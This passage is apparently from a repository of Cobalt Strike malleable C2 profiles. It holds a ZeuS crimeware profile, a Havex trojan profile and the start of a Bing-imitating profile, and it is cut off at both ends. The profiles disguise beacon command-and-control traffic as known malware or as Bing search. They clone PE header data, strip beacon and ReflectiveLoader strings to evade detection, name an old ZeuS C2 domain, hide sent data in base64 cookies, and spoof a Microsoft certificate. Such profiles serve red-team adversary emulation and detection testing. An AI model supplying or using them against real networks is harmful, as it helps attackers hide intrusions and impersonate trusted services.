125 | } 126 | -------------------------------------------------------------------------------- /crimeware/zeus.profile: -------------------------------------------------------------------------------- 1 | # 2 | # ZeuS Sample Profile 3 | # client - https://malwr.com/analysis/NjIwNTU2ODA2OTUxNDcwNmJiMTMzYzk4YzU4NWQyZDQ/ 4 | # server - http://malware-traffic-analysis.net/2014/04/05/index.html 5 | # 6 | # Author: @harmj0y 7 | # 8 | set sample_name "ZeuS"; 9 | 10 | set sleeptime "30000"; 11 | set jitter "5"; 12 | set maxdns "255"; 13 | set useragent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"; 14 | 15 | # Sample from: https://malshare.com/sample.php?action=detail&hash=1da10c6412b79fe8ffcbb5d1901144ee 16 | stage { 17 | # ./peclone 1da10c6412b79fe8ffcbb5d1901144ee 18 | set checksum "0"; 19 | set compile_time "24 Mar 2011 07:36:23"; 20 | set entry_point "93589"; 21 | set rich_header "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 22 | set stomppe "false"; 23 | 24 | # strings -e l 1da10c6412b79fe8ffcbb5d1901144ee 25 | stringw "nspr4.dll"; 26 | stringw ".tmp"; 27 | stringw "DISPLAY"; 28 | stringw "SeShutdownPrivilege"; 29 | stringw "cGlobal\\%08X%08X%08X"; 30 | stringw "TSeTcbPrivilege"; 31 | stringw ".exe"; 32 | stringw "SOFTWARE\\Microsoft"; 33 | stringw "SysListView32"; 34 | stringw "MDIClient"; 35 | stringw "CiceroUIWndFrame"; 36 | stringw "ConsoleWindowClass"; 37 | stringw "#32768"; 38 | stringw "SysShadow"; 39 | stringw "e.dat"; 40 | stringw "kernel32.dll"; 41 | stringw "\"%s\""; 42 | stringw "\"%s\" %s"; 43 | stringw "/c \"%s\""; 44 | stringw "ComSpec"; 45 | stringw "S:(ML;;NRNWNX;;;LW)"; 46 | stringw "SeSecurityPrivilege"; 47 | stringw "S:(ML;CIOI;NRNWNX;;;LW)"; 48 | stringw "Global\\"; 49 | stringw "Local\\"; 50 | stringw "%s%08x.%s"; 51 | stringw "%s%08x"; 52 | 53 | # strings 1da10c6412b79fe8ffcbb5d1901144ee 54 | string "del \"%s\""; 55 | string "if exist \"%s\" goto d"; 56 | string "@echo off"; 57 | string "del /F \"%s\""; 58 | 59 | # get rid of some standard Cobalt Strike stuff. 60 | transform-x86 { 61 | strrep "beacon.dll" ""; 62 | strrep "ReflectiveLoader" ""; 63 | } 64 | 65 | transform-x64 { 66 | strrep "beacon.x64.dll" ""; 67 | strrep "ReflectiveLoader" ""; 68 | } 69 | } 70 | 71 | http-get { 72 | 73 | set uri "/metro91/admin/1/ppptp.jpg"; 74 | 75 | client { 76 | 77 | header "Accept" "*/*"; 78 | header "Connection" "Close"; 79 | 80 | # throw in a known/old Zeus C2 domain 81 | header "Host" "mahamaya1ifesciences.com"; 82 | header "Cache-Control" "no-cache"; 83 | 84 | metadata { 85 | base64; 86 | header "Cookie"; 87 | } 88 | } 89 | 90 | server { 91 | header "Server" "nginx/1.0.4"; 92 | header "Content-Type" "text/html"; 93 | header "Connection" "close"; 94 | header "X-Powered-By" "PHP/5.3.8-1~dotdeb.2"; 95 | 96 | output { 97 | print; 98 | } 99 | } 100 | } 101 | 102 | http-post { 103 | 104 | set uri "/metro91/admin/1/secure.php"; 105 | 106 | client { 107 | 108 | header "Accept" "*/*"; 109 | header "Connection" "Keep-Alive"; 110 | 111 | # throw in a known/old Zeus C2 domain 112 | header "Host" "mahamaya1ifesciences.com"; 113 | header "Cache-Control" "no-cache"; 114 | 115 | id { 116 | netbios; 117 | parameter "id"; 118 | } 119 | 120 | output { 121 | print; 122 | } 123 | } 124 | 125 | server { 126 | header "Server" "nginx/1.0.4"; 127 | header "Content-Type" "text/html"; 128 | header "Connection" "close"; 129 | header "X-Powered-By" "PHP/5.3.8-1~dotdeb.2"; 130 | 131 | output { 132 | print; 133 | } 134 | } 135 | } 136 | 137 | -------------------------------------------------------------------------------- /APT/havex.profile: -------------------------------------------------------------------------------- 1 | # havex trojan C&C profile 2 | # Actor: Energetic Bear / Crouching Yeti / Dragonfly 3 | # 4 | # See: 5 | # . http://www.symantec.com/connect/blogs/emerging-threat-dragonfly-energetic-bear-apt-group 6 | # . https://securelist.com/files/2014/07/EB-YetiJuly2014-Public.pdf 7 | # . http://pastebin.com/qCdMwtZ6 8 | # . http://www.crowdstrike.com/sites/all/themes/crowdstrike2/css/imgs/platform/CrowdStrike_Global_Threat_Report_2013.pdf 9 | # . https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Havex.yar 10 | # . http://web.archive.org/web/20170808180137/www.f-secure.com/weblog/archives/00002718.html 11 | # . https://www.virustotal.com/#/file/3d3daee1a38e67707921b222f1685d5bd6328af2fc80d4c11d92dc6a6c289261/details 12 | # 13 | # Author: @armitagehacker 14 | 15 | set sample_name "HaveX Trojan"; 16 | 17 | set sleeptime "30000"; 18 | 19 | set useragent "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08"; 20 | 21 | set pipename "mypipe-f##"; 22 | set pipename_stager "mypipe-h##"; 23 | 24 | # Clone some header values (Sample from: https://malshare.com/sample.php?action=detail&hash=c6e161a948f4474849d5740b2f27964a) 25 | # ./peclone c6e161a948f4474849d5740b2f27964a 26 | stage { 27 | set checksum "0"; 28 | set compile_time "30 Dec 2013 07:53:48"; 29 | set entry_point "134733"; 30 | set image_size_x86 "348160"; 31 | set image_size_x64 "348160"; 32 | set name "Tmprovider.dll"; 33 | set rich_header "\x63\x02\x25\x0f\x27\x63\x4b\x5c\x27\x63\x4b\x5c\x27\x63\x4b\x5c\x9a\x2c\xdd\x5c\x24\x63\x4b\x5c\x2e\x1b\xde\x5c\x3b\x63\x4b\x5c\x2e\x1b\xcf\x5c\x1b\x63\x4b\x5c\x2e\x1b\xc8\x5c\x8f\x63\x4b\x5c\x00\xa5\x30\x5c\x28\x63\x4b\x5c\x27\x63\x4a\x5c\x97\x63\x4b\x5c\x2e\x1b\xc1\x5c\x60\x63\x4b\x5c\x2e\x1b\xd9\x5c\x26\x63\x4b\x5c\x39\x31\xdf\x5c\x26\x63\x4b\x5c\x2e\x1b\xda\x5c\x26\x63\x4b\x5c\x52\x69\x63\x68\x27\x63\x4b\x5c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 34 | 35 | # disable this little obfuscation 36 | set stomppe "false"; 37 | 38 | # make these things havex-ish 39 | transform-x86 { 40 | strrep "ReflectiveLoader" "RunDllEntry"; 41 | strrep "beacon.dll" ""; 42 | } 43 | 44 | transform-x64 { 45 | strrep "ReflectiveLoader" "RunDllEntry"; 46 | strrep "beacon.x64.dll" ""; 47 | } 48 | 49 | # strings gathered from Yara rules and sandbox string dumps 50 | stringw "%s <%s> (Type=%i, Access=%i, ID='%s')"; 51 | stringw "%02i was terminated by ThreadManager(2)\n"; 52 | stringw "main sort initialise ...\n"; 53 | stringw "qsort [0x%x, 0x%x] done %d this %d\n"; 54 | stringw "{0x%08x, 0x%08x}"; 55 | stringw "Programm was started at %02i:%02i:%02i\n"; 56 | stringw "a+"; 57 | stringw "%02i:%02i:%02i.%04i:"; 58 | stringw "**************************************************************************\n"; 59 | stringw "Start finging of LAN hosts...\n"; 60 | stringw "Finding was fault. Unexpective error\n"; 61 | stringw "Hosts was't found.\n"; 62 | stringw "\t\t\t\t\t%O2i) [%s]\n"; 63 | stringw "Start finging of OPC Servers..."; 64 | stringw "Was found %i OPC Servers."; 65 | stringw "\t\t%i) [%s\\%s]\n\t\t\tCLSID: %s\n"; 66 | stringw "\t\t\tUserType: %s\n\t\t\tVerIndProgID: %s\n"; 67 | stringw "OPC Servers not found. Programm finished"; 68 | stringw "Start finging of OPC Tags..."; 69 | stringw "[-]Threads number > Hosts number"; 70 | stringw "[-]Can not get local ip"; 71 | stringw "[!]Start"; 72 | stringw "[+]Get WSADATA"; 73 | stringw "[+]Local:"; 74 | stringw "[-]Connection error"; 75 | stringw "Was found %i hosts in LAN:"; 76 | stringw "%s[%s]!!!EXEPTION %i!!!"; 77 | stringw "final combined CRC = 0x%08x"; 78 | } 79 | 80 | http-get { 81 | set uri "/include/template/isx.php /wp06/wp-includes/po.php /wp08/wp-includes/dtcla.php"; 82 | 83 | client { 84 | header "Referer" "http://www.google.com"; 85 | header "Accept" "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"; 86 | header "Accept-Language" "en-us,en;q=0.5"; 87 | 88 | # base64 encoded Cookie is not a havex indicator, but a place to stuff our data 89 | metadata { 90 | base64; 91 | header "Cookie"; 92 | } 93 | } 94 | 95 | server { 96 | header "Server" "Apache/2.2.26 (Unix)"; 97 | header "X-Powered-By" "PHP/5.3.28"; 98 | header "Cache-Control" "no-cache"; 99 | header "Content-Type" "text/html"; 100 | header "Keep-Alive" "timeout=3, max=100"; 101 | 102 | output { 103 | base64; 104 | prepend "Sorry, no data corresponding your request."; 106 | print; 107 | } 108 | } 109 | } 110 | 111 | # define indicators for an HTTP POST 112 | http-post { 113 | set uri "/modules/mod_search.php /blog/wp-includes/pomo/src.php /includes/phpmailer/class.pop3.php"; 114 | 115 | client { 116 | header "Content-Type" "application/octet-stream"; 117 | 118 | # transmit our sess id as /whatever.php?id=[identifier] 119 | id { 120 | parameter "id"; 121 | } 122 | 123 | # post our output with no real changes 124 | output { 125 | print; 126 | } 127 | } 128 | 129 | # The server's response to our HTTP POST 130 | server { 131 | header "Server" "Apache/2.2.26 (Unix)"; 132 | header "X-Powered-By" "PHP/5.3.28"; 133 | header "Cache-Control" "no-cache"; 134 | header "Content-Type" "text/html"; 135 | header "Keep-Alive" "timeout=3, max=100"; 136 | 137 | # this will just print an empty string, meh... 138 | output { 139 | prepend "blah blah blah"; 140 | mask; 141 | base64; 142 | prepend "Sorry, no data corresponding your request."; 144 | print; 145 | } 146 | } 147 | } 148 | -------------------------------------------------------------------------------- /normal/bingsearch_getonly.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Bing Web Search 3 | # 4 | # Author: @bluscreenofjeff 5 | # 6 | 7 | https-certificate { 8 | set CN "www.bing.com"; 9 | set O "Microsoft Corporation"; 10 | set C "US"; 11 | set L "Redmond"; 12 | set OU "Microsoft IT"; 13 | set ST "WA"; 14 | set validity "365"; 15 | } 16 | 17 | set sleeptime "60000"; 18 | set jitter "20"; 19 | set useragent "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"; 20 | set dns_idle "8.8.4.4"; 21 | set maxdns "235"; 22 | 23 | http-get { 24 | 25 | set uri "/search/"; 26 | 27 | client { 28 | 29 | header "Host" "www.bing.com"; 30 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 31 | header "Cookie" "DUP=Q=GpO1nJpMnam4UllEfmeMdg2&T=283767088&A=1&IG"; 32 | 33 | metadata { 34 | base64url; 35 | parameter "q"; 36 | } 37 | 38 | parameter "go" "Search"; 39 | parameter "qs" "bs"; 40 | parameter "form" "QBRE"; 41 | 42 | 43 | } 44 | 45 | server { 46 | 47 | header "Cache-Control" "private, max-age=0"; 48 | header "Content-Type" "text/html; charset=utf-8"; 49 | header "Vary" "Accept-Encoding"; 50 | header "Server" "Microsoft-IIS/8.5"; 51 | header "Connection" "close"; 52 | 53 | 54 | output { 55 | netbios; 56 | prepend "Bing